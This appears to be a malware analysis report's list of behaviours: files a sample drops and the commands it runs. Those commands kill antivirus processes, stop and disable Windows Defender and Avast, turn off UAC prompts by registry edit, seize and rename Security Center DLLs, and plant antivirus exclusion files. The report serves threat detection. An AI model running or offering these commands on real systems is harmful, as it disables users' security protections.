Technical Information
- Windows Defender
- '<SYSTEM32>\taskkill.exe' /im msseces.exe /f
- '<SYSTEM32>\taskkill.exe' /F /IM MSASCui.exe
- '<SYSTEM32>\taskkill.exe' /F /IM ByteFence.exe
- <SYSTEM32>\secure1-64bit.exe
- <SYSTEM32>\secure2-64bit.exe
- <SYSTEM32>\securedua-64bit.exe
- <SYSTEM32>\secure1.bat
- <SYSTEM32>\-.lnk
- %TEMP%\d534.tmp\sec-2.bat
- <SYSTEM32>\avwin.ini
- <SYSTEM32>\exceptions.dat
- <SYSTEM32>\exclusions.ini
- <SYSTEM32>\secure1+2-32bit™.apx
- <SYSTEM32>\2
- %PROGRAMDATA%\avira\antivir desktop\config\avwin.ini
- %PROGRAMDATA%\avg\av\db\exceptions.dat
- %PROGRAMDATA%\avast software\avast\exclusions.ini
- <SYSTEM32>\avwin.ini
- <SYSTEM32>\exceptions.dat
- <SYSTEM32>\exclusions.ini
- <SYSTEM32>\secure1+2-32bit™.apx
- <SYSTEM32>\2
- %TEMP%\d534.tmp\sec-2.bat
- from <SYSTEM32>\wscapi.dll to <SYSTEM32>\wscapi.old
- from <SYSTEM32>\wscsvc.dll to <SYSTEM32>\wscsvc.old
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
- '<SYSTEM32>\secure1-64bit.exe'
- '<SYSTEM32>\secure2-64bit.exe'
- '<SYSTEM32>\securedua-64bit.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\D534.tmp\sec-2.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "<SYSTEM32>\secure1.bat"
- '<SYSTEM32>\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v MSC
- '<SYSTEM32>\sc.exe' delete "rtop"
- '<SYSTEM32>\sc.exe' config "rtop" start= disabled
- '<SYSTEM32>\sc.exe' stop "rtop"
- '<SYSTEM32>\sc.exe' config WerSvc start= disabled
- '<SYSTEM32>\sc.exe' stop WerSvc
- '<SYSTEM32>\sc.exe' delete UxSms
- '<SYSTEM32>\sc.exe' stop UxSms
- '<SYSTEM32>\sc.exe' delete newserv
- '<SYSTEM32>\sc.exe' stop newserv
- '<SYSTEM32>\sc.exe' delete "NanoServiceMain"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\sc.exe' stop "NanoServiceMain"
- '<SYSTEM32>\sc.exe' stop "avast! Antivirus"
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscui.dll /grant administrators:F
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscui.cpl
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscsvc.dll /grant administrators:F
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscsvc.dll
- '<SYSTEM32>\msiexec.exe' /x {8F023021-A7EB-45D3-9269-D65264C81729} /quiet
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscapi.dll /grant administrators:F
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\D534.tmp\sec-2.bat" "
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscapi.dll
- '<SYSTEM32>\sc.exe' delete "avast! Antivirus"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWKS /t REG_DWORD /d 00000001 /f